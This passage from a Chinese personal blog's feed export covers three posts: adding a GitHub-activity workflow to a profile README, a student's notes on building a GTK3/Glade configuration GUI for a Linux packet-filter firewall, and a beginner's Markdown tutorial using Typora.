<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e765d28b6f.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e765d28b6f.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e765d28b6f.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>

<p>如果有其他需求，可以在项目仓库的<code>README.md</code>查看其他参数</p>
<h2 id="添加GitHub活动"><a href="#添加GitHub活动" class="headerlink" title="添加GitHub活动"></a>添加GitHub活动</h2><article class="message is-info"><div class="message-body">
<p>来源：<a href="https://github.com/jamesgeorge007/github-activity-readme">项目仓库</a></p>
</div></article>

<p>效果图：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e752e7ee82.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e752e7ee82.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e752e7ee82.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>

<p>在<code>README.md</code>中需要添加GitHub活动的位置写下<code>&lt;!--START_SECTION:activity--&gt;</code><br>在<code>.github/workflows/</code>目录下添加<code>update-readme.yml</code>文件（方法见<a href="#way">上一节</a>）<br>复制以下代码进去：</p>
<figure class="highlight yaml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="attr">name:</span> <span class="string">Update</span> <span class="string">README</span></span><br><span class="line"></span><br><span class="line"><span class="attr">on:</span></span><br><span class="line">  <span class="attr">schedule:</span></span><br><span class="line">    <span class="bullet">-</span> <span class="attr">cron:</span> <span class="string">'0 * * * *'</span></span><br><span class="line">  <span class="attr">workflow_dispatch:</span></span><br><span class="line"></span><br><span class="line"><span class="attr">jobs:</span></span><br><span class="line">  <span class="attr">build:</span></span><br><span class="line">    <span class="attr">runs-on:</span> <span class="string">ubuntu-latest</span></span><br><span class="line">    <span class="attr">name:</span> <span class="string">Update</span> <span class="string">this</span> <span class="string">repo's</span> <span class="string">README</span> <span class="string">with</span> <span class="string">recent</span> <span class="string">activity</span></span><br><span class="line"></span><br><span class="line">    <span class="attr">steps:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">uses:</span> <span class="string">actions/checkout@v2</span></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">uses:</span> <span class="string">jamesgeorge007/github-activity-readme@master</span></span><br><span class="line">        <span class="attr">env:</span></span><br><span class="line">          <span class="attr">GITHUB_TOKEN:</span> <span class="string">${{</span> <span class="string">secrets.GITHUB_TOKEN</span> <span class="string">}}</span></span><br></pre></td></tr></tbody></table></figure>

<p>同样地，可以手动运行对应的workflow看看效果。</p>
<h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><article class="message is-info"><div class="message-header">
<p>参考</p>
</div><div class="message-body">
<p><a href="https://github.com/rzashakeri/beautify-github-profile">beautify-github-profile项目</a></p>
</div></article>

<p>喜欢倒腾的小伙伴可以在该项目的文档中寻找更多有趣的功能实现！</p>
]]></content>
      <categories>
        <category>前端</category>
      </categories>
      <tags>
        <tag>GitHub</tag>
      </tags>
  </entry>
  <entry>
    <title>GTK应用开发小记</title>
    <url>/posts/gtk-first/</url>
    <content><![CDATA[<p>夏季学期课程的小组作业，是要开发一个基于Linux内核模块的包过滤防火墙。主要有两部分的任务：</p>
<ol>
<li><p>配置程序</p>
<p>运行在应用层，用来配置过滤规则，包括协议类型、IP地址、端口号、开始和结束时间、是否启用规则等。</p>
</li>
<li><p>Linux内核模块</p>
<p>运行在内核层，完成包过滤防火墙的功能，该模块借助注册Netfilter钩子函数的方式来实现对数据包的过滤和控制。</p>
</li>
</ol>
<p>我主要负责了第一部分的任务：开发一个友好的包过滤规则的配置和管理界面（GUI部分，CLI部分由组里另一位同学负责）。支持包过滤的规则导入、导出，添加、编辑、 删除、搜索等功能。应用界面如下：</p>
<div class="tag-plugin swiper-container" width="max"><div class="swiper-wrapper"><div class="swiper-slide"><img no-lazy="" src="https://bu.dusays.com/2023/07/12/64ae07efdadeb.png" alt="日间模式"></div><div class="swiper-slide"><img no-lazy="" src="https://bu.dusays.com/2023/07/12/64ae55e8d7ffb.png" alt="暗黑模式"></div><div class="swiper-slide"><img no-lazy="" src="https://bu.dusays.com/2023/07/12/64ae081b86e69.png" alt="编辑页面"></div><div class="swiper-slide"><img no-lazy="" src="https://bu.dusays.com/2023/07/12/64ae55693dde3.png" alt="关于页面+日志页面"></div></div><div class="swiper-pagination"></div><div class="swiper-button-prev blur"></div><div class="swiper-button-next blur"></div></div>

<p>谈不上好看，但也不至于很丑。</p>
<h2 id="GTK-vs-QT"><a href="#GTK-vs-QT" class="headerlink" title="GTK vs QT"></a>GTK vs QT</h2><p>GTK和QT是非常有名的两个GUI库，当然QT应该是更有名些。GTK和QT的优势对比如下：</p>
<ul>
<li>QT：<ol>
<li>跨平台性：QT是一个跨平台的工具包，可以在多个操作系统上运行，包括Windows、Linux、macOS等。它提供了一致的API，使得开发者可以轻松地编写一次代码，然后在不同的平台上进行部署和运行。</li>
<li>高度集成：QT提供了丰富的组件和工具，涵盖了广泛的应用开发需求，包括图形渲染、网络通信、数据库访问等。它还提供了开发者友好的IDE和调试工具，使得开发过程更加高效。</li>
<li>QML和Qt Quick：QT引入了QML和Qt Quick技术，允许开发者使用声明性语言和组件化的方式来设计和构建用户界面。这种方式简化了UI设计和开发的过程，并提供了良好的可扩展性。</li>
<li>商业支持：QT由The Qt Company开发和维护，提供了商业许可和支持服务。这对于企业级应用开发来说是一个优势，因为他们可以获得专业的技术支持和保障。</li>
</ol>
</li>
<li>GTK：<ol>
<li>开源性：GTK是一个开源工具包，它的代码可以被自由地查看、修改和分发。这对于开源社区和个人开发者来说是一个优势，他们可以根据自己的需求进行自定义和改进。</li>
<li>UNIX哲学：GTK是基于UNIX哲学设计的，它鼓励模块化和简洁的设计。这种设计理念使得GTK在Linux等UNIX-like系统上有着很好的集成和兼容性。</li>
<li>GNOME集成：GTK是GNOME桌面环境的默认工具包，它与GNOME的集成非常紧密。如果你计划开发适用于GNOME桌面环境的应用程序，使用GTK可能更加方便和自然。</li>
<li>多语言支持：GTK支持多种编程语言，包括C、C++、Python等。这使得开发者可以使用自己喜欢的编程语言来进行应用程序的开发。</li>
</ol>
</li>
</ul>
<p>最终我是选择了GTK3进行GUI开发，原因如下：</p>
<ol>
<li>这次开发的防火墙程序是基于Linux内核模块的，所以只能在Linux系统使用，不需要考虑GUI的跨平台。</li>
<li><a href="https://help.gnome.org/users/glade3/">Glade</a>应用提供了GTK应用的UI设计功能，起到和QML、Qt Quick类似的作用。</li>
<li>开源、不需要商业支持。</li>
<li>防火墙属于网络层的应用，不需要太多功能，简洁至上。</li>
<li>在Ubuntu22.04环境下开发，使用GTK接近原生UI。</li>
<li>GTK的默认样式足够好看。</li>
</ol>
<h2 id="GTK-amp-glade学习"><a href="#GTK-amp-glade学习" class="headerlink" title="GTK &amp; glade学习"></a>GTK &amp; glade学习</h2><p>GTK相比QT的一个最大劣势就是文档更少、社区也更不活跃。B站和YouTube搜索QT，有非常多的教程，而GTK相对来说就比较少了。另外GTK4已经问世数年，但是教程大多还是GTK3。之前提到用来设计GTK应用UI的glade，支持的最高GTK版本也是GTK3。</p>
<p>好在对于这样一个简单的GUI应用，只需要入门GTK便可。学习一样工具，我总是喜欢边学边做。因此视频+文档的组合往往是更适合我的。在我学习GTK开发的过程中，主要参考了以下资源：</p>
<ol>
<li><p><a href="https://www.youtube.com/watch?v=g-KDOH_uqPk&amp;list=PLmMgHNtOIstZEvqYJncYUx52n8_OV0uWy">Linux Gtk Glade Programming</a></p>
<p>YouTube上的GTK &amp; glade开发教程，没有涵盖GTK的所有类，但对入门来说够用而且友好。</p>
</li>
<li><p><a href="https://www.cs.uni.edu/~okane/Code/Glade%20Cookbook/">视频中的源代码</a></p>
<p>更多时候我其实是直接看源代码学习，视频节奏有些拖沓，一旦理解GTK和glade是怎样工作的，看代码会是更高效的解决方法。</p>
</li>
<li><p><a href="https://docs.gtk.org/gtk3/">GTK3文档</a></p>
<p>文档很全面，但只有英文。</p>
</li>
<li><p>ChatGPT</p>
<p>文档没写全的、视频没讲到的可以问问GPT。看看思路可以，3.5写出来的代码可能不能直接用。</p>
</li>
</ol>
<h2 id="GTK-amp-glade开发流程"><a href="#GTK-amp-glade开发流程" class="headerlink" title="GTK &amp; glade开发流程"></a>GTK &amp; glade开发流程</h2><p>使用GTK &amp; glade开发，主要是应用UI设计和功能实现分离的思想。</p>
<ol>
<li><p>在glade应用中设计UI</p>
<p>哪里是按钮，哪里需要输入框，哪里需要列表等等，需要提前构思好。</p>
</li>
<li><p>在glade应用中连接信号（signals）</p>
<p>所谓信号，就是当用户与界面发生某种特定的交互时，应用程序便会知悉，并可根据这种信号回调对应的函数、传入特定的数据进行特定的操作。可以在glade中连接信号并指定对应的回调函数，以及需要传入的数据。这样在后续功能实现时，只需将这些函数的功能实现即可，也很好地实现了模块化。</p>
</li>
<li><p>编写GTK代码</p>
<p>主要是实现之前在glade中指定的回调函数。另外，一些用于提示用户的对话框也可以直接用代码生成。</p>
</li>
<li><p>编译程序</p>
<p>在开发阶段，一般从glade文件加载builder（gtk_builder_new_from_file），并使用<code>gcc</code>的<code>-export-dynamic</code>参数。这样一来，修改glade文件后无需重新编译就可以看到新的UI。</p>
<p>而在生产环境中，不能使用上述方法。因为上述方法编译的应用程序需要依赖glade文件运行，而一般用于生产环境的应用程序需要将glade文件一同编译成最后的二进制程序。因此要从资源中加载builder（gtk_builder_new_from_resource）。因此首先要把glade文件编译成资源，这个过程需要用到<code>glib-compile-resources</code>工具。具体方法可以参照<a href="https://www.youtube.com/watch?v=HCCpBtiR46A&amp;list=PLmMgHNtOIstZEvqYJncYUx52n8_OV0uWy&amp;index=33">Linux Gtk Glade Programming Part 34: Embedding resources in your app</a>。</p>
</li>
</ol>
<h2 id="难点"><a href="#难点" class="headerlink" title="难点"></a>难点</h2><ol>
<li><p>TreeView</p>
<p>GTK中的TreeView以及ListBox是非常重要的组件，适合用于用户与系统的数据交互，区别在于TreeView可以有多层父子结构，而ListBox只有单层。</p>
</li>
<li><p>Log功能</p>
<p>Log功能的第一版思想是：每隔一段时间（如1s）监测日志文件的变化，当日志文件大小发生改变时，将新增的内容显示在应用的TextView当中。但是如果使用一个线程，会导致应用要轮流处理与用户的交互和日志文件的监测，而日志文件又需要频繁监测，造成较差的用户体验。因此为监测日志文件变化的功能单独创建一个线程进行处理。</p>
<p>但是线程需要应对一系列互斥与共享的问题，因此我换了一种实现方法。</p>
<p>第二版的思想是：使用<code>GFileMonitor</code>来监测文件的变化，当文件变化时，会发出一个信号，GTK应用能捕捉这个信号并做出相应的处理。</p>
<p><code>GFileMonitor</code> VS 多线程：</p>
<ul>
<li><p>优点:</p>
<ul>
<li>GFileMonitor使用更简单,不需要自己编写多线程逻辑。它提供了文件变化事件的回调接口,只需要关心事件处理逻辑。</li>
<li>GFileMonitor对文件系统事件的处理可能更高效。它基于操作系统提供的文件变化监控机制,不需要频繁地轮询检查文件。</li>
<li>GFileMonitor可以方便地跨平台使用,而自行实现的多线程文件监视可能需要针对不同平台调整。</li>
</ul>
</li>
<li><p>缺点:</p>
<ul>
<li>GFileMonitor的可定制性较低,不能自由控制轮询频率等参数。</li>
<li>GFileMonitor可能不支持监视网络文件系统或一些特殊文件系统。</li>
<li>GFileMonitor基于系统调用,系统开销可能略大于纯用户态的多线程实现。</li>
<li>自行实现的多线程方案可以加入更多自定义逻辑,例如合并事件、缓存等。</li>
</ul>
</li>
</ul>
</li>
</ol>
<h2 id="源代码（完整程序）"><a href="#源代码（完整程序）" class="headerlink" title="源代码（完整程序）"></a>源代码（完整程序）</h2><div class="tag link"><a class="link-card" title="VersaGuard-FireWall" href="https://github.com/BeaCox/VersaGuard-Firewall"><div class="left"><img src="https://github.githubassets.com/favicons/favicon.svg" class="lazyload" data-srcset="https://github.githubassets.com/favicons/favicon.svg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></div><div class="right"><p class="text">VersaGuard-FireWall</p><p class="url">https://github.com/BeaCox/VersaGuard-Firewall</p></div></a></div>
]]></content>
      <categories>
        <category>项目</category>
      </categories>
      <tags>
        <tag>C</tag>
        <tag>设计</tag>
      </tags>
  </entry>
  <entry>
    <title>Markdown基础教程（Typora为例）</title>
    <url>/posts/mdLearn/</url>
    <content><![CDATA[<h2 id="什么是Markdown"><a href="#什么是Markdown" class="headerlink" title="什么是Markdown"></a>什么是Markdown</h2><p>Markdown是一种轻量级标记语言，易读易写的纯文本格式编写文档。Markdown编写文档后缀为md<span id="more"></span></p>
<h2 id="为什么要用markdown"><a href="#为什么要用markdown" class="headerlink" title="为什么要用markdown"></a>为什么要用markdown</h2><ul>
<li>简单易上手，可读性强。</li>
<li>兼容html，但在排版、链接、标题等写法上都简单许多。本站的博客都是用Markdown编写的。</li>
<li>用途广，如今Github、简书、csdn等许多网站都支持Markdown语法编写</li>
<li>做项目时可以用来编写简洁明了的README.md来介绍功能、用法等</li>
</ul>
<h2 id="Markdown编辑器"><a href="#Markdown编辑器" class="headerlink" title="Markdown编辑器"></a>Markdown编辑器</h2><ul>
<li>Typora	<br>个人目前的首选编辑器。可以利用css实现自定义样式；内置LaTex，方便编辑数学公式；可以实时预览。<br>支持MacOS、Windows、Linux。<br>1.0以前的版本免费，之后的版本收费。可以根据需要购买。<br>官网：<a href="https://typora.io/">https://typora.io/</a>	中文站：<a href="https://typoraio.cn/">https://typoraio.cn/</a></li>
<li>VSCode<br>对于码农朋友们来说应该非常熟悉了。<br>可以点击链接在<a href="https://code.visualstudio.com/">官网</a>下载。<br>安装相应的Markdown插件之后就能有不错的Markdown编辑器体验了。<br>这里分享一篇VSCode Markdown插件的教程博客：<a href="https://blog.csdn.net/weixin_39340061/article/details/114940143?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164947719316782092962723%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=164947719316782092962723&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-114940143.142%5Ev7%5Econtrol,157%5Ev4%5Econtrol&amp;utm_term=vscode+markdown%E6%8F%92%E4%BB%B6&amp;spm=1018.2226.3001.4187">CSDN博客</a></li>
<li>Notedpad++<br>官网下载地址：<a href="https://notepad-plus-plus.org/downloads/">https://notepad-plus-plus.org/downloads/</a></li>
<li>Notion<br>学生认证可以免费升级，还支持移动端。功能不止于Markdown编辑器，是一款笔记和效率应用。<br>官网下载地址：<a href="https://www.notion.so/">https://www.notion.so/</a></li>
</ul>
<h2 id="开始教程正文"><a href="#开始教程正文" class="headerlink" title="开始教程正文"></a>开始教程正文</h2><h3 id="标题"><a href="#标题" class="headerlink" title="标题"></a>标题</h3><p>Markdown支持6种级别的标签，对应到html就是h1~h6，数字越小，标题等级越高，字体越大。语法如下：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line"># 一级标题</span><br><span class="line">## 二级标题</span><br><span class="line">### 三级标题</span><br><span class="line">#### 四级标题</span><br><span class="line">##### 五级标题</span><br><span class="line">###### 六级标题</span><br></pre></td></tr></tbody></table></figure>

<p>以上语言的效果如下：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2023/06/18/648e76b13a126.png" data-fancybox="one" data-caption="标题"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2023/06/18/648e76b13a126.png" class="lazyload" data-srcset="https://bu.dusays.com/2023/06/18/648e76b13a126.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="标题"></a><span class="image-caption">标题</span></div></div>

<h3 id="注释"><a href="#注释" class="headerlink" title="注释"></a>注释</h3><p>语法：<code>&lt;!--</code>这里是被注释掉的内容<code>--&gt;</code><br>和html中的注释语法是一样的，被注释掉的部分将对读者不可见。写一些注释对你理解自己的文章结构是有好处的。</p>
<h3 id="换行与分段"><a href="#换行与分段" class="headerlink" title="换行与分段"></a>换行与分段</h3><p>换行是两句属于同一段，不在同一行；<br>分段则是两句在不同行、不同段。会比换行有更明显的行间距<br>举例说明：</p>
<p><em>这两句是换行</em><br><em>这两句是换行</em></p>
<p><strong>这两句是分段</strong></p>
<p><strong>这两句是分段</strong></p>
<p>换行：在两句之间加入<code>&lt;br&gt;</code>或<code>&lt;br /&gt;</code>实现换行。<br>    <em><strong>注：如果你正在使用typora，<code>shift</code>+<code>enter</code>可以换行</strong></em></p>
<p>分段：<code>enter</code></p>
<h3 id="字体"><a href="#字体" class="headerlink" title="字体"></a>字体</h3><p>用*或_包裹一段文字可以用来强调。<br>一对是斜体，两对是加粗，三对是加粗斜体</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">*这里是斜体*</span><br><span class="line">_这里是斜体_</span><br><span class="line"></span><br><span class="line">**这里是加粗**</span><br><span class="line">__这里是加粗__</span><br><span class="line"></span><br><span class="line">***这里是加粗斜体***</span><br><span class="line">___这里是加粗斜体___</span><br></pre></td></tr></tbody></table></figure>

<p>以上代码的显示效果如下：</p>
<p><em>这里是斜体</em><br><em>这里是斜体</em></p>
<p><strong>这里是加粗</strong><br><strong>这里是加粗</strong></p>
<p><em><strong>这里是加粗斜体</strong></em><br><em><strong>这里是加粗斜体</strong></em></p>
<p>除此之外还有高亮语法</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">==这里是高亮==</span><br></pre></td></tr></tbody></table></figure>

<p>==这里是高亮==</p>
<h3 id="下划线和删除线"><a href="#下划线和删除线" class="headerlink" title="下划线和删除线"></a>下划线和删除线</h3><p>非链接尽量避免使用下划线，以免和链接混淆，读者体验很差。这里不多赘述。<br>删除线是用的比较多的一个语法</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">~~加上删除线~~</span><br></pre></td></tr></tbody></table></figure>

<p><del>加上删除线</del></p>
<h3 id="上标和下标"><a href="#上标和下标" class="headerlink" title="上标和下标"></a>上标和下标</h3><p>用一对<code>^</code>包裹上标。如<code>x^2^</code>显示为x^2^<br>用一对<code>~</code>包裹下标。如<code>H~2~O</code>显示为H<del>2</del>O</p>
<h3 id="引用"><a href="#引用" class="headerlink" title="引用"></a>引用</h3><h4 id="单行引用"><a href="#单行引用" class="headerlink" title="单行引用"></a>单行引用</h4><figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">&gt;引用内容</span><br></pre></td></tr></tbody></table></figure>

<blockquote>
<p>引用内容</p>
</blockquote>
<h4 id="多行引用"><a href="#多行引用" class="headerlink" title="多行引用"></a>多行引用</h4><figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">&gt;第一行引用</span><br><span class="line">&gt;第二行引用</span><br></pre></td></tr></tbody></table></figure>

<blockquote>
<p>第一行引用<br>第二行引用</p>
</blockquote>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">&gt;第一行使用'&gt;'</span><br><span class="line">后面行省略也是引用</span><br></pre></td></tr></tbody></table></figure>

<blockquote>
<p>第一行使用’&gt;’<br>后面行省略也是引用</p>
</blockquote>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">&gt;引用内容需要分段时，</span><br><span class="line">&gt;</span><br><span class="line">&gt;可以在引用内容中加一个空行</span><br></pre></td></tr></tbody></table></figure>

<blockquote>
<p>引用内容需要分段时，</p>
<p>可以在引用内容中加一个空行</p>
</blockquote>
<p>另外，在引用中可以使用任意Markdown语法</p>
<h3 id="列表"><a href="#列表" class="headerlink" title="列表"></a>列表</h3><p><em>在符号后记得加上空格</em></p>
<h4 id="无序列表"><a href="#无序列表" class="headerlink" title="无序列表"></a>无序列表</h4><figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">* 可以使用'*'作为标记</span><br><span class="line">+ 也可以使用'+'作为标记</span><br><span class="line">- 也可以是'-'</span><br></pre></td></tr></tbody></table></figure>

<ul>
<li>可以使用’*’作为标记</li>
</ul>
<ul>
<li>也可以使用’+’作为标记</li>
</ul>
<ul>
<li>也可以是’-‘</li>
</ul>
<h4 id="有序列表"><a href="#有序列表" class="headerlink" title="有序列表"></a>有序列表</h4><figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">1. 有序列表以阿拉伯数字和'.'开始</span><br><span class="line">2. 数字的顺序不影响生成的列表索引</span><br><span class="line">1. 比如这样</span><br><span class="line">2. 但是建议按照自然顺序编写</span><br></pre></td></tr></tbody></table></figure>

<ol>
<li>有序列表以阿拉伯数字和’.’开始</li>
<li>数字的顺序不影响生成的列表索引</li>
<li>比如这样</li>
<li>但是建议按照自然顺序编写</li>
</ol>
<h4 id="嵌套序列"><a href="#嵌套序列" class="headerlink" title="嵌套序列"></a>嵌套序列</h4><figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">1. 第一层</span><br><span class="line">	+ 第二层</span><br><span class="line">	+ 第二层</span><br><span class="line">2. 无序列表和有序列表可以以任一方式嵌套</span><br><span class="line">	1. 2-1</span><br><span class="line">	2. 2-2</span><br></pre></td></tr></tbody></table></figure>

<ol>
<li>第一层<ul>
<li>第二层</li>
<li>第二层</li>
</ul>
</li>
<li>无序列表和有序列表可以以任一方式嵌套<ol>
<li>2-1</li>
<li>2-2</li>
</ol>
</li>
</ol>
<h3 id="分割线"><a href="#分割线" class="headerlink" title="分割线"></a>分割线</h3><p>在一行中使用三个及以上的*,+,-来添加分割线</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">***</span><br><span class="line">++++</span><br><span class="line">-----</span><br></pre></td></tr></tbody></table></figure>

<hr>
<hr>
<hr>
<p>符号之间加上空白字符是被允许的</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">* * *</span><br></pre></td></tr></tbody></table></figure>

<hr>
<h3 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h3><h4 id="行内代码"><a href="#行内代码" class="headerlink" title="行内代码"></a>行内代码</h4><p>用一对反引号’ 来包裹行内代码（切换英文输入后按<code>tab</code>键上面，<code>1</code>键左边的按键）</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">`这里是行内代码`</span><br></pre></td></tr></tbody></table></figure>

<p><code>这里是行内代码</code></p>
<h4 id="代码块"><a href="#代码块" class="headerlink" title="代码块"></a>代码块</h4><p>可以在代码块中展示多行代码，可以允许复制，清晰易用<br>用一对```来包裹代码块</p>
<figure class="highlight c++"><table><tbody><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span><span class="comment">//前面是```</span></span></span><br><span class="line"><span class="keyword">using</span> namespacestd;<span class="comment">//后面是```</span></span><br></pre></td></tr></tbody></table></figure>

<p>==值得一提的是，在行内代码和代码块中Markdown语法是无效的==</p>
<h3 id="超链接"><a href="#超链接" class="headerlink" title="超链接"></a>超链接</h3><h4 id="行内式"><a href="#行内式" class="headerlink" title="行内式"></a>行内式</h4><p>格式为<code>[展示给读者的链接名称](路径，读者不可见)</code></p>
<ul>
<li><p>网络路径</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">[我的Gitgub主页](https://github.com/BeaCox)</span><br></pre></td></tr></tbody></table></figure>

<p><a href="https://github.com/BowenYoung">我的Gitgub主页</a></p>
</li>
<li><p>本地相对路径<br>如./images/icon.png</p>
</li>
<li><p>本地绝对路径<br>如C:\Users\Admin\Desktop\setu.png</p>
</li>
</ul>
<h4 id="自动链接"><a href="#自动链接" class="headerlink" title="自动链接"></a>自动链接</h4><p>使用<code>&lt;&gt;</code>包裹的URL或邮箱地址会被自动转换为超链接</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">&lt;https://github.com/BeaCox&gt;</span><br><span class="line">&lt;root@beacox.space&gt;</span><br></pre></td></tr></tbody></table></figure>

<p><a href="https://github.com/BeaCox">https://github.com/BeaCox</a><br><a href="mailto:root@beacox.space">root@beacox.space</a></p>
<p>适用于较短的链接，不然显得很丑<br>==另外，邮箱还可以用<code>[名称](mailto:你的邮箱地址)</code>==<br>如<a href="mailto:root@beacox.space">我的邮箱</a><br>还有一种参考式用起来比较麻烦一些，有兴趣可以自己了解一下</p>
<h3 id="图像"><a href="#图像" class="headerlink" title="图像"></a>图像</h3><p>和插入超链接的语法基本一致，在最前面加了一个<code>!</code>。<br>也分行内式和参考式。<br>路径也分为网络路径和本地的相对、绝对路径。<br>这里就做一个网络路径的演示。</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">![哆啦A梦](https://gimg2.baidu.com/image_search/src=http%3A%2F%2Fc-ssl.duitang.com%2Fuploads%2Fitem%2F201501%2F07%2F20150107123112_xPJLh.thumb.1000_0.jpeg&amp;refer=http%3A%2F%2Fc-ssl.duitang.com&amp;app=2002&amp;size=f9999,10000&amp;q=a80&amp;n=0&amp;g=0n&amp;fmt=auto?sec=1652103506&amp;t=a7a2bc00990a39a5b2cd1547a7f4b9d0)</span><br></pre></td></tr></tbody></table></figure>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://gimg2.baidu.com/image_search/src=http%3A%2F%2Fc-ssl.duitang.com%2Fuploads%2Fitem%2F201501%2F07%2F20150107123112_xPJLh.thumb.1000_0.jpeg&amp;refer=http%3A%2F%2Fc-ssl.duitang.com&amp;app=2002&amp;size=f9999,10000&amp;q=a80&amp;n=0&amp;g=0n&amp;fmt=auto?sec=1652103506&amp;t=a7a2bc00990a39a5b2cd1547a7f4b9d0" data-fancybox="one" data-caption="哆啦A梦"><img fancybox="" itemprop="contentUrl" src="https://gimg2.baidu.com/image_search/src=http%3A%2F%2Fc-ssl.duitang.com%2Fuploads%2Fitem%2F201501%2F07%2F20150107123112_xPJLh.thumb.1000_0.jpeg&amp;refer=http%3A%2F%2Fc-ssl.duitang.com&amp;app=2002&amp;size=f9999,10000&amp;q=a80&amp;n=0&amp;g=0n&amp;fmt=auto?sec=1652103506&amp;t=a7a2bc00990a39a5b2cd1547a7f4b9d0" class="lazyload" data-srcset="https://gimg2.baidu.com/image_search/src=http%3A%2F%2Fc-ssl.duitang.com%2Fuploads%2Fitem%2F201501%2F07%2F20150107123112_xPJLh.thumb.1000_0.jpeg&amp;refer=http%3A%2F%2Fc-ssl.duitang.com&amp;app=2002&amp;size=f9999,10000&amp;q=a80&amp;n=0&amp;g=0n&amp;fmt=auto?sec=1652103506&amp;t=a7a2bc00990a39a5b2cd1547a7f4b9d0" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="哆啦A梦"></a><span class="image-caption">哆啦A梦</span></div></div>

<h3 id="转义字符"><a href="#转义字符" class="headerlink" title="转义字符"></a>转义字符</h3><p>下列字符都可以通过使用反斜杠字符<code>\</code>达到转义目的，避免与要用于Markdown语法的那些混淆</p>
<table>
<thead>
<tr>
<th>字符</th>
<th>名称</th>
</tr>
</thead>
<tbody><tr>
<td>\</td>
<td>反斜杠</td>
</tr>
<tr>
<td>`</td>
<td>反引号</td>
</tr>
<tr>
<td>*</td>
<td>星号</td>
</tr>
<tr>
<td>_</td>
<td>下划线</td>
</tr>
<tr>
<td>()</td>
<td>圆括号</td>
</tr>
<tr>
<td>[]</td>
<td>方括号</td>
</tr>
<tr>
<td>{}</td>
<td>花括号</td>
</tr>
<tr>
<td>#</td>
<td>井号</td>
</tr>
<tr>
<td>+</td>
<td>加号</td>
</tr>
<tr>
<td>-</td>
<td>减号</td>
</tr>
<tr>
<td>.</td>
<td>句点</td>
</tr>
<tr>
<td>!</td>
<td>感叹号</td>
</tr>
<tr>
<td>|</td>
<td>管道符</td>
</tr>
</tbody></table>
<h3 id="表格"><a href="#表格" class="headerlink" title="表格"></a>表格</h3><h4 id="单元格和表头"><a href="#单元格和表头" class="headerlink" title="单元格和表头"></a>单元格和表头</h4><p>使用|来分隔不同的单元格，使用-分隔表头和其他行。</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">|name|money|</span><br><span class="line">|---|---|</span><br><span class="line">|Jobs|$10|</span><br><span class="line">|Young|$10000000000|</span><br></pre></td></tr></tbody></table></figure>

<table>
<thead>
<tr>
<th>name</th>
<th>money</th>
</tr>
</thead>
<tbody><tr>
<td>Jobs</td>
<td>$10</td>
</tr>
<tr>
<td>Young</td>
<td>$10000000000</td>
</tr>
</tbody></table>
<h4 id="对齐"><a href="#对齐" class="headerlink" title="对齐"></a>对齐</h4><p>在表头下方的分割线标记中加入<code>:</code>，即可标记下方单元格内容的对齐方式</p>
<ul>
<li><code>:---</code> 左对齐</li>
<li><code>:--:</code>居中对齐</li>
